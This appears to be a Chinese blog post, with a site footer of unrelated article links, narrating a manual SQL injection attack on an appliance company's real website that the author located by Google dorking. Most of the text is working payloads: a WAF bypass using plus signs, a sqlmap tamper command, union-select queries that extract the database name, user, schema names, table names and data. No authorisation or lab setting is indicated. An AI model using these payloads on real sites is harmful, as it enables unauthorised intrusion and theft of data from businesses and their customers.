0x01.寻找目标

inurl:.php?id= intext:电器

找到了一个电器公司的网站，随便测了测，发现有waf

这还不安排（找了点资料，貌似直接加号代替空格就可以，直接尝试）

0x02.操作

发现没有waf拦截了

资料还说了

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py

工具我尝试了发现无法开始

就这样子......

0x03.手注

http://*/*.php?id=1+and+1=1  #回显正常
http://*/*.php?id=1+and+1=2  #回显错误
说明存在注入

http://*/*.php?id=1+order+by+15  #15回显错误
http://*/*.php?id=1+order+by+14  #14回显正常
说明有14个字段

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1让它错误然后执行后面

它回显了第2和第8

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查询当前数据库信息和当前用户
一些常见的函数
version()  #显示数据库当前版本
database() / schema()  #显示当前数据库名
user() / system_user() / session_user() / current_user() / current_user()  #显示当前用户名称
charset(str)  #返回字符串str的字符集
collation(str)  #返回字符串str的字符排列方式

0x04.查数据

爆数据库

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1

它不能group_concat,那我就一个一个查了！
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #从2开始取一个

爆数据表

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

爆数据

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1

总结：

1.工具跑不起就只能手注了

2.实践了下mysql的手注

# mysql  # 数据库  # 说了  # 找了  # 让它  # 这样子  # 这还  # 就可以  # 起就  # 字段名  # 找到了  # 发现有 

相关栏目： 【 网站优化151355 】 【 网络推广146373 】 【 网络技术251813 】 【 AI营销90571 】

相关推荐： 敲碗10年！Mac系列传将迎来「触控与联网」双革新  Laravel队列任务超时怎么办_Laravel Queue Timeout设置详解  微信小程序 五星评分(包括半颗星评分)实例代码  Laravel如何处理CORS跨域问题_Laravel项目CORS配置与解决方案  图册素材网站设计制作软件,图册的导出方式有几种？  通义万相免费版怎么用_通义万相免费版使用方法详细指南【教程】  Laravel如何实现多对多模型关联？（Eloquent教程）  潮流网站制作头像软件下载,适合母子的网名有哪些？  html5的keygen标签为什么废弃_替代方案说明【解答】  微信小程序制作网站有哪些,微信小程序需要做网站吗？  canvas 画布在主流浏览器中的尺寸限制详细介绍  如何在万网自助建站平台快速创建网站？  Edge浏览器如何截图和滚动截图_微软Edge网页捕获功能使用教程【技巧】  Win11怎样安装网易有道词典_Win11安装词典教程【步骤】  北京企业网站设计制作公司,北京铁路集团官方网站？  Laravel如何实现API资源集合？（Resource Collection教程）  在线ppt制作网站有哪些软件,如何把网页的内容做成ppt？  Laravel如何发送系统通知？（Notification渠道示例）  ChatGPT 4.0官网入口地址 ChatGPT在线体验官网  Windows驱动无法加载错误解决方法_驱动签名验证失败处理步骤  javascript基于原型链的继承及call和apply函数用法分析  Laravel如何使用Blade模板引擎？（完整语法和示例）  Laravel观察者模式如何使用_Laravel Model Observer配置  广州网站制作公司哪家好一点,广州欧莱雅百库网络科技有限公司官网？  Laravel Admin后台管理框架推荐_Laravel快速开发后台工具  软银砸40亿美元收购DigitalBridge 强化AI资料中心布局  高端建站三要素：定制模板、企业官网与响应式设计优化  html5源代码发行怎么设置权限_访问权限控制方法与实践【指南】  作用域操作符会触发自动加载吗_php类自动加载机制与::调用【教程】  JavaScript数据类型有哪些_如何准确判断一个变量的类型  Laravel中间件如何使用_Laravel自定义中间件实现权限控制  WEB开发之注册页面验证码倒计时代码的实现  大连网站制作费用,大连新青年网站，五年四班里的视频怎样下载啊？  Android自定义listview布局实现上拉加载下拉刷新功能  html如何与html链接_实现多个HTML页面互相链接【互相】  微信小程序 scroll-view组件实现列表页实例代码  Midjourney怎么调整光影效果_Midjourney光影调整方法【指南】  C++用Dijkstra(迪杰斯特拉)算法求最短路径  BootStrap整体框架之基础布局组件  javascript事件捕获机制【深入分析IE和DOM中的事件模型】  使用PHP下载CSS文件中的所有图片【几行代码即可实现】  如何在HTML表单中获取用户输入并结合JavaScript动态控制复利计算循环  新三国志曹操传主线渭水交兵攻略  Angular 表单中正确绑定输入值以确保提交与验证正常工作  HTML5空格和margin有啥区别_空格与外边距的使用场景【说明】  如何正确选择百度移动适配建站域名？  Laravel如何编写单元测试和功能测试？（PHPUnit示例）  今日头条AI怎样推荐抢票工具_今日头条AI抢票工具推荐算法与筛选【技巧】  PythonWeb开发入门教程_Flask快速构建Web应用  头像制作网站在线观看,除了站酷，还有哪些比较好的设计网站？